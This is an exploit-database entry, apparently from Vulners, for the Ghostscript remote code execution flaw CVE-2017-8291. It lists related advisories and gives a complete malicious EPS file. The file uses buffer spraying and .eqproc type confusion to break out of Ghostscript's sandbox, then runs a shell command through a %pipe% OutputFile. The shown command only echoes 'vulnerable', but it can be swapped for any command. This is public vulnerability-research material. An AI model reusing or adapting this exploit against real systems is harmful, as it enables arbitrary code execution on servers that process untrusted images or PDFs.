Ghostscript remote code execution (CVE-2017-8291) (ghostbutt)

🗓️ 29 Apr 2017 00:00:00Reported by RootType

Ghostscript remote code execution (CVE-2017-8291) ghostbut

Reporter	Title	Published	Views	Family All 118
0day.today	Ghostscript 9.21 Type Confusion Arbitrary Command Execution Exploit	2 May 201700:00	–	zdt
GithubExploit	Exploit for CVE-2018-16509	15 Oct 201807:44	–	githubexploit
IBM Security Bulletins	Security Bulletin: A vulnerability in ghostscript affects PowerKVM	18 Jun 201801:36	–	ibm
ATTACKERKB	CVE-2017-8291	27 Apr 201700:00	–	attackerkb
Amazon	Important: ghostscript	6 Jun 201700:00	–	amazon
Tenable Nessus	Amazon Linux AMI : ghostscript (ALAS-2017-837)	7 Jun 201700:00	–	nessus
Tenable Nessus	CentOS 6 / 7 : ghostscript (CESA-2017:1230)	16 May 201700:00	–	nessus
Tenable Nessus	Debian DLA-932-1 : ghostscript security update	8 May 201700:00	–	nessus
Tenable Nessus	Debian DSA-3838-1 : ghostscript - security update	1 May 201700:00	–	nessus
Tenable Nessus	EulerOS 2.0 SP1 : ghostscript (EulerOS-SA-2017-1100)	9 Jun 201700:00	–	nessus


                                                %!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

29 Apr 2017 00:00Current

7.9High risk

Vulners AI Score7.9

EPSS0.92931